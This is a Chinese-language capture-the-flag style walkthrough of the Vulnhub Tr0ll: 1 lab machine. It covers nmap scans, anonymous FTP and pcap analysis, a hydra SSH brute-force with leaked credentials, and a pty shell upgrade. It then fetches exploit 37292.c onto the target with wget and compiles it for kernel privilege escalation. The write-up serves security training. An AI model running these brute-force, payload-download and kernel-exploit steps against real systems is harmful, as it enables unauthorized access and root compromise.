Tr0ll: 1 Vulnhub靶机渗透笔记

Tr0ll: 1

本博客提供的所有信息仅供学习和研究目的，旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动，您将独自承担全部法律责任。本博客明确表示不支持、不鼓励也不参与任何形式的非法活动。

如有侵权请联系我第一时间删除
靶机地址

Tr0ll: 1 ~ VulnHub

信息收集

nmap

主机发现

nmap -sn 192.168.236.128/24

tcp扫描

┌──(observer㉿kali)-[~/Tr0ll]
└─$ nmap -sT 192.168.236.136 -p- --min-rate 10000 -oA tcpscan
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-08 19:59 CST
Nmap scan report for 192.168.236.136
Host is up (0.0027s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 1.56 seconds

udp扫描

┌──(observer㉿kali)-[~/Tr0ll]
└─$ sudo nmap -sU 192.168.236.136 --min-rate 10000 -oA udpscan
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-08 20:01 CST
Nmap scan report for 192.168.236.136
Host is up (0.00024s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
814/udp   closed unknown
6970/udp  closed unknown
17946/udp closed unknown
19933/udp closed unknown
48078/udp closed unknown
49202/udp closed unknown
MAC Address: 00:0C:29:8C:0A:29 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds

刚刚扫描tcp扫到21ftp，22ssh，80web，现在对这三个端口进行详细的扫描

detail_tcpscan

┌──(observer㉿kali)-[~/Tr0ll]
└─$ sudo nmap -sT -sV -sC -O 192.168.236.136 -p 21,22,80 --min-rate 10000 -oA tcpscan_detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-08 20:13 CST
Nmap scan report for 192.168.236.136
Host is up (0.00040s latency).PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.236.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
MAC Address: 00:0C:29:8C:0A:29 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds

漏洞脚本扫描

nmap -script=vuln -p22,21,80 -min-rate 10000 -oA scriptvuln 192.168.236.136

这里不知道什么原因，扫不到东西

攻击面分析&尝试&getshell

那就不管了，主要看一下detail里的东西 这里本来是要先分析一下的，分析ftp的时候直接匿名登陆拿到了一个流量包，看到了一个关键的目录，然后去web渗透拿到了一些凭据，爆破后就ssh，思路就还挺简单的，所以就省略这个分析了

ftp

运行的是 vsftpd (Very Secure FTP Daemon) 3.0.2 版本

运行匿名登录，这个很值得关注:

 ftp-anon: Anonymous FTP login allowed  

在匿名登录的情况下，存在一个名为 lol.pcap 的文件具有读写执行权限 (-rwxrwxrwx)，这表示任何连接到FTP服务器的人都可以读取、修改或删除这个文件。这对于安全性来说是一个严重的风险，因为它可能允许未授权的用户上传恶意内容或者修改现有文件。

-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]

ftp连接以明文传输

控制连接是以明文形式进行的。这意味着客户端与服务器之间的命令交互（例如登录、目录更改等）不会被加密。
|      Control connection is plain text数据连接也将以明文形式进行。这表示当传输文件或目录列表时，这些数据也不会被加密
|      Data connections will be plain text

当我ftp不给用户名进去后，给出一条这样的报错，This FTP server is anonymous only 猜测anonymous就是管理员的username，而我们匿名进去是没有权限执行命令的

这里还尝试了用root，还是提示只能用anonymous

那就用anonymous匿名登录吧，提示输入密码，直接回车给他一个空密码，成功连接到了ftp，尝试输入ls ，是ok的 ，过了一会这个ftp就掉了，回头看tcp扫描结果发现 Session timeout in seconds is 600 ，也就是说600秒就会timeout，不过不影响什么

把这个流量文件下载下来

get lol.pcap

在wireshark中发现了一个secret_stuff.txt

但我尝试ftp去下载，也尝试web端去路由他，都失败了，那他到底是个什么呢，仔细看wireshark的流量，这里是抓到了request请求下载secret_stuff.txt ，仔细看一下，搞清楚下载过程的流量来源，又一开始我们就知道ftp是以明文传输数据的，既然这里有抓包的流量，也就是说这个响应包里肯定就是明文

将响应包里的明文拿出来：

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n
\n
Sucks, you were so close... gotta TRY HARDER!\n

大概意思就是 好好好，你真是个小机灵鬼，你差不多找到了sup3rs3cr3tdirlol 😛

真遗憾，你差一点就成功了… 还得再加把劲！

这个sup3rs3cr3tdirlol是leet speak风格的文字，其实就是supersecretdirlol超级秘密目录，猜测大概率是一个目录

web

直接访问80端口，是一个欠揍的暴漫表情

之前tcp扫描提示有/secret，访问一下看看，发现更欠揍了

目录扫描一下dirsearch和dirb都扫一下，都没有什么发现

访问ftp得到的/sup3rs3cr3tdirlol有一个文件，我们wget把他下载到kali

从这里开始我的思路就断了，然后去看了别人的blog。。 QAQ

直接cat一堆乱码不太好看，用strings从二进制文件中提取可打印的字符序列，或许可以看到一些我们想要的线索

看到Find address 0x0856BF to proceed ，意思让我们去找这个地址来继续，这会是个目录吗？

还真是，给了两个目录，一个用户名，一个passwd

先下载到kali里，方便用hrdra九头蛇去爆破一下ssh和ftp（这两个都可以登录）

wget http://192.168.236.136/0x0856BF/good_luck/which_one_lol.txt

wget http://192.168.236.136/0x0856BF/this_folder_contains_the_password/Pass.txt
--2024-12-08 23:32:21--  http://192.168.236.136/0x0856BF/this_folder_contains_the_password/Pass.txt

vim处理一下which_one_lol.txt

┌──(observer㉿kali)-[~/Tr0ll]
└─$ vim which_one_lol.txt                                                                                      
┌──(observer㉿kali)-[~/Tr0ll]
└─$ cat which_one_lol.txt 
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow

hydra基础用法：使用语法：hydra 参数 IP地址 服务名
帮助命令：hydra -h
常用命令：hydra [-l 用户名|–L 用户名文件路径] [-p 密码|–P 密码文件路径] [-t 线程数] [–vV 显示详细信息] [–o 输出文件路径] [–f 找到密码就停止] [–e ns 空密码和指定密码试探] [ip|-M ip列表文件路径]

ftp

sudo hydra -L /YourPath/which_one_lol.txt -p /YourPath/Pass.txt 192.168.236.136 ssh 

ssh

sudo hydra -L /YourPath/which_one_lol.txt -p /YourPath/Pass.txt 192.168.236.136 ssh 

上面两条指令尝试用Pass.txt里的内容去爆破，都失败了

目录名提示说this_folder_contains_the_password

直接用这个文件名去ssh 成功拿到ssh的凭据：overflow Pass.txt

sudo hydra -L /YourPath/which_one_lol.txt -p Pass.txt 192.168.236.136 ssh 

ssh获取初步shell

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu

22端口跑的是一个OpenSSH服务，是6.6.1p1版本，服务器提供了DSA、RSA、ECDSA和ED25519 这几种密钥公钥算法用于主机认证

已经拿到一组凭据了，ssh连接获得初步shell

ssh overflow@192.168.236.136

成功登录

用python提升一下交互性

查询是否有python

dpkg -l | grep python

是有的，而且挺全的

那就用执行这条语句得到一个交互性更好的shell

python -c 'import pty;pty.spawn("/bin/bash")'

Pass.txt

ssh overflow@192.168.236.136

提权

信息收集

想sudo -l查看当前用户权限，但报错了，不允许使用这条命令

那就用uname -a查看一下靶机的内核版本，Linux 3.13.0

overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux

这里提供了几种方式来查看linux版本，以及内核版本

$ cat /proc/version    #查看GCC版本号，linux版本号，Ubuntu版本号 
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014$ lsb_release -a
No LSB modules are available.        
Distributor ID: Ubuntu               #类别是Ubuntu
Description:    Ubuntu 14.04.1 LTS   #LTS是Long Term Support:长时间支持版本
Release:        14.04                #发行日期或者发行版本号
Codename:       trusty 				#ubuntu的代号名称$ uname -a    #显示linux 的内核版本和系统是多少位的：X86_64代表系统是64位的
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux#  使用 /etc/lsb-release 或 /etc/os-release 命令$ cat /etc/os-release
#与 Ubuntu 16.04 及更高版本兼容
#查看信息列表，其中包括您的 Ubuntu 版本号及其版本名称。
#此外，还有一些指向 Ubuntu 网站和资源的链接可以为您提供帮助
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"$ cat /etc/lsb-release   
#它是为旧系统设计的，因此如果您运行的是过时的 Ubuntu 版本，则可以使用它
#使用该命令将返回更简单的结果，其中显示版本 ID、描述和代号。它不包括链接和 Ubuntu 版本名称
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"$ cat /etc/issue    
#/etc/issue 文件是基于文本的文档。它包含系统标识数据
#因为该命令不会显示您的 Ubuntu 版本以外的任何内容
Ubuntu 14.04.1 LTS \n \l$ hostnamectl
#使用 hostnamectl 命令。
#当您要更改系统的主机名时，通常使用此方法。
#但是，它还会返回 Ubuntu 版本和计算机 ID 等信息。Static hostname: trollIcon name: computer-vmChassis: vmBoot ID: e43aaf51725843209b9e700f5eab15f9Operating System: Ubuntu 14.04.1 LTSKernel: Linux 3.13.0-32-genericArchitecture: i686

其中lsb表示(Linux Standard Base)：LSB是一套核心标准,它保证了LINUX发行版同LINUX应用程序之间的良好结合,具体地说,它是：
1、一个二进制接口规范，是指应用程序在系统间迁移时不用重新编译，保证应用程序在所有经过认证的LINUX发行版上都具有兼容性。
2、一个测试规范，测试LINUX发行版和LINUX应用程序是否符合LSB标准。
3、搭建遵从LSB规范的应用程序的开发环境。
4、为在纯LSB环境下运行和测试应用程序而提供的运行环境样本。

uname --s 显示内核名字
uname --r 显示内核版本
uname --n 显示网络主机名
uname --p 显示cpu

Exploit查询payload

根据内核版本在Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers查找对应的payload，并用searchsploit下载到kali上

searchsploit Linux 3.13.0
searchsploit -m 37292.c

Exp利用

在攻击机上开一个php服务或python服务，都可以

sudo php -S 0:80

这里用到了一个不起眼但是很有用的/tmp目录，参考Linux中最低调、最易让人忽视的tmp目录，原来用处那么大！-腾讯云开发者社区-腾讯云

在Linux操作系统中，tmp目录是一个临时目录，用于存储临时文件。这个目录通常位于根目录下，命名为/tmp。本文将详细介绍Linux中的tmp目录，包括它的作用、权限、使用方法和安全性等方面。

作用

tmp目录用于存储临时文件，这些文件通常是由操作系统或应用程序创建的。这些文件可以是日志文件、临时缓存文件、程序临时文件、打印队列文件等。它们在使用后很快就会被删除，因此/tmp目录通常保持相对较小的大小。

权限

在Linux中，tmp目录的权限通常设置为777（rwxrwxrwx），这意味着任何用户都可以访问和修改该目录中的文件。这是为了方便临时文件的创建和删除。然而，由于/tmp目录通常包含敏感信息，因此一些系统管理员可能会更改其权限以提高安全性。

使用方法

/tmp目录在Linux中被广泛使用。下面是/tmp目录的几个主要用途：

1. 缓存

/tmp目录通常用于存储临时缓存文件，这些文件可以加速某些操作。例如，浏览器会将下载的文件保存到/tmp目录中，以便更快地访问这些文件。

2. 打印队列

打印服务通常会将打印任务存储在/tmp目录中。这些文件在打印完成后会自动删除。

3. 应用程序临时文件

某些应用程序需要在运行期间创建临时文件。例如，视频编辑器需要创建临时文件以存储正在编辑的视频文件。

4. 日志文件

某些程序会将日志文件保存在/tmp目录中。这些日志文件通常包含程序运行期间的信息，例如错误消息或调试信息。

5. 其他

/tmp目录还可用于其他临时文件的存储，例如备份文件、邮件附件等。

安全性

尽管/tmp目录通常是一个临时目录，但它也可能包含一些敏感信息，例如密码文件或其他保密数据。因此，在使用/tmp目录时需要注意安全问题。下面是一些有关使用/tmp目录的安全建议：

1. 避免在/tmp目录中存储敏感信息

尽管/tmp目录通常会自动清理，但为了确保安全，最好避免在其中存储敏感信息。如果必须存储敏感信息，则应考虑将文件加密或将其存储在其他地方。

2. 定期清理/tmp目录

为了保证安全，建议定期清理/tmp目录。这可以防止/tmp目录被填满，从而导致系统崩溃或无法正常工作。

3. 限制/tmp目录的权限

由于/tmp目录通常包含敏感信息，一些系统管理员可能会限制其访问权限，以提高安全性。这可以通过更改目录权限或使用安全模块（如SELinux）来实现。

4. 避免使用/tmp目录作为共享目录

/tmp目录通常是一个临时目录，不应用于共享目录。如果必须在多个计算机之间共享文件，则应使用其他共享目录，例如NFS共享目录或Samba共享目录。

5. 防止/tmp目录成为攻击者的入口

/tmp目录可能成为攻击者攻击系统的入口。攻击者可能通过/tmp目录中的漏洞来执行恶意代码，因此需要采取一些措施来保护/tmp目录的安全。这可以通过升级系统补丁、安装防病毒软件或使用安全模块等方式实现。

结论

在Linux中，tmp目录是一个重要的临时目录，用于存储临时文件。尽管/tmp目录通常自动清理，但在使用时需要注意安全问题。为了确保安全，建议避免在其中存储敏感信息，定期清理/tmp目录，并限制其访问权限。此外，还应采取一些措施来防止/tmp目录成为攻击者的入口。通过这些措施，可以确保/tmp目录在系统中的安全使用。

在靶机上使用wget从攻击机上下载payload（记得先cd到/tmp）

wget http://192.168.236.128:80/37292.c

将C语言文件编译为二进制文件

cc -o exp 37292.c
或者用gcc
gcc 37292.c -o exp

授权，并执行文件，获取root权限

chmod +x exp

./exp即可提权

定妆照：